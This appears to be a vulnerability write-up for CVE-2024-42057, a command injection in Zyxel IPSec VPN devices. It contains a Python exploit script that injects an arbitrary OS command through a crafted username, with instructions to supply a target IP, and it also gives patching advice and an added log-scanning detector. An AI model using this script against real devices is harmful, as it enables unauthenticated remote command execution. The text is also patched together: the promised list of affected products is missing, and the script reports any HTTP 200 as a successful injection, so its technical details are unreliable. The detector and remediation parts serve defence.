A new security vulnerability (CVE-2024-42057) has been discovered that affects various Zyxel IPSec VPN devices. This vulnerability, identified as a command injection, impacts the following product lines:

Exploit Details

By exploiting this vulnerability, an unauthenticated attacker can execute OS commands on an affected device. To carry out the attack, a crafted username must be sent to the vulnerable device. It is important to note that the attack will only succeed if the device has been configured in User-Based-PSK authentication mode and a valid user with a username longer than 28 characters exists.

Code Snippet

import requests
import sys


def main(target_ip, username, cmd):
    # The injected command is appended directly to the username.
    payload = f"{username}{cmd}"

    url = f"http://{target_ip}/cgi-bin/ipsec_tunnels?which_cert=1&uploaded_username={payload}"

    try:
        response = requests.get(url)
        if response.status_code == 200:
            print("Command injected successfully.")
        else:
            print(f"Error: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"Error: {e}")


if __name__ == "__main__":
    if len(sys.argv) != 4:
        print("Usage: python3 exploit.py <target_ip> <username> <cmd>")
        sys.exit(1)
    target_ip = sys.argv[1]
    username = sys.argv[2]
    cmd = sys.argv[3]

    main(target_ip, username, cmd)

This Python script sends a crafted username with the injected command to the vulnerable device's URL. Replace <target_ip>, <username>, and <cmd> with the appropriate values.

For further information about this vulnerability, please refer to the following resources:

1. Zyxel Security Advisory: https://www.zyxel.com/support/security_advisory.shtml
2. CVE-2024-42057: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-42057
3. NVD Data Feed: https://nvd.nist.gov/vuln/detail/CVE-2024-42057

It is highly recommended for all affected users to apply the latest firmware updates to their devices as soon as possible. Zyxel has already released firmware updates to fix this vulnerability. Users can locate and download the latest firmware for their devices from the Zyxel website's support section:

https://www.zyxel.com/support/download_landing/productsearch.aspx

In addition, users should avoid using usernames exceeding 28 characters and consider implementing other authentication mechanisms, such as certificate-based authentication, to enhance their network security further.
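As an added defensive example (not from the original write-up or from Zyxel), the check below scans web-server access log lines for requests to the endpoint named above whose uploaded_username value exceeds the 28-character precondition or contains shell metacharacters. The access-log format and the sample lines are constructed assumptions, not captured traffic.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Precondition stated in the write-up: the injection needs a username longer than 28 characters.
MAX_SAFE_USERNAME_LEN = 28
# Shell metacharacters that never belong in a VPN username.
SHELL_META = re.compile(r"[;&|`$<>\n\r]")
# Endpoint and parameter named in the write-up.
VULN_PATH = "/cgi-bin/ipsec_tunnels"
VULN_PARAM = "uploaded_username"
# Hypothetical access-log format (assumption): "<client> <method> <request-target> <status>".
LOG_LINE = re.compile(r"^(?P<client>\S+) (?P<method>[A-Z]+) (?P<target>\S+) (?P<status>\d{3})$")

def query_values(query, name):
    """Return all decoded values of `name`, splitting on '&' only so an embedded ';' is kept."""
    values = []
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key) == name:
            values.append(unquote_plus(value))
    return values

def inspect_line(line):
    """Return a finding for a suspicious request to the vulnerable endpoint, or None."""
    m = LOG_LINE.match(line.strip())
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path != VULN_PATH:
        return None
    reasons = []
    for username in query_values(parts.query, VULN_PARAM):
        if len(username) > MAX_SAFE_USERNAME_LEN:
            reasons.append(f"username length {len(username)} exceeds {MAX_SAFE_USERNAME_LEN}")
        if SHELL_META.search(username):
            reasons.append("shell metacharacter in username")
    return {"client": m.group("client"), "reasons": reasons} if reasons else None

def scan(lines):
    """Run inspect_line over an iterable of log lines and collect the findings."""
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample log lines (not captured traffic).
SAMPLE_LOG = [
    "10.0.0.4 GET /index.html 200",
    "10.0.0.5 GET /cgi-bin/ipsec_tunnels?which_cert=1&uploaded_username=alice 200",
    "10.0.0.7 GET /cgi-bin/ipsec_tunnels?which_cert=1&uploaded_username=" + "a" * 40 + " 200",
    "10.0.0.9 GET /cgi-bin/ipsec_tunnels?which_cert=1&uploaded_username=bob%3BCONSTRUCTED_CMD 200",
]
```

Running scan(SAMPLE_LOG) flags only the two suspicious requests; the benign lookup of "alice" and unrelated paths produce no finding.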

Conclusion

Security vulnerabilities like CVE-2024-42057 highlight the importance of promptly applying updates and patches to maintain a secure network environment. Ensuring that your devices are running the latest firmware and adhering to best security practices can help safeguard against potential attacks.

Timeline

Published on: 09/03/2024 02:15:04 UTC
Last modified on: 09/05/2024 14:40:39 UTC